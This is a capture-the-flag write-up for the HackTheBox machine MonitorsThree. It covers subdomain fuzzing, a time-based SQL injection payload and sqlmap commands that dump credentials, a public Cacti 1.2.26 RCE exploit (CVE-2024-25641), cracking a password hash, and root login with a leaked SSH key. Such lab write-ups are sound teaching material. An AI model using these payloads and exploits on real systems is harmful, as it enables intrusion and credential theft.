Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

MonitorsThree (HTB – Medium)

The machine hosts a Cacti monitoring instance on a hidden subdomain. A time‑based SQL injection on the main site reveals valid credentials, allowing login to Cacti. Cacti 1.2.26 is vulnerable to authenticated RCE (CVE‑2024‑25641). Privilege escalation is achieved by discovering that the SSH private key for marcus actually belongs to root.

Overview

Target: monitorsthree.htb
Initial vector: SQL injection → admin credentials
Privilege escalation: leaked root SSH key

Enumeration

Initial enumeration of monitorsthree.htb reveals nothing useful. Directory fuzzing shows only static assets.

Virtual host fuzzing:

$ ffuf -u http://monitorsthree.htb -H "Host: FUZZ.monitorsthree.htb" \
  -w directory-list-2.3-medium.txt -fs 13560
-> cacti.monitorsthree.htb

Add the subdomain to /etc/hosts and browse it: 

http://cacti.monitorsthree.htb
-> Cacti 1.2.26

Cacti 1.2.26 is known to be vulnerable to authenticated RCE (CVE‑2024‑25641), but credentials are needed first.

SQL Injection – Main Site

The main site contains a password reset form: 

http://monitorsthree.htb/forgot_password.php

Testing with a single quote reveals SQL injection. A time‑based payload confirms it: 

username=admin' AND IF(SUBSTRING(database(),13,1)='e',SLEEP(2),NULL)-- -

Use sqlmap to automate extraction: 

$ sqlmap -r req_2.txt --batch --dbs
$ sqlmap -r req_2.txt -D monitorsthree_db --tables
$ sqlmap -r req_2.txt -T users --dump

Recovered credentials: 

admin : greencacti2001

These work on both the main site and the Cacti panel.

Foothold – Cacti 1.2.26 RCE

Use a public exploit: 

https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26

Run it:

$ python3 exploit.py -u admin -p greencacti2001

A shell is obtained as the web user.

Database Enumeration

Cacti database credentials are stored in the application directory: 

cactiuser : cactiuser

Connect to MariaDB: 

MariaDB [cacti]> select * from user_auth;

Relevant entry: 

marcus : $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK

Crack it: 

$ john hash.txt -w /usr/share/wordlists/rockyou.txt
-> 12345678910

Switch user: 

$ su marcus

Privilege Escalation

Inside /home/marcus is an SSH private key: 

id_rsa

However, the key does not belong to marcus — it belongs to root. Copy it to the attacker machine and set permissions: 

$ chmod 600 id_rsa
$ ssh -i id_rsa root@monitorsthree.htb

Root access obtained.

Conclusion

MonitorsThree combines a simple time‑based SQL injection with an authenticated Cacti RCE. After dumping database credentials and exploiting Cacti, the final privilege escalation is achieved by discovering that the SSH private key in marcus’s home directory actually belongs to root. This provides immediate full system compromise.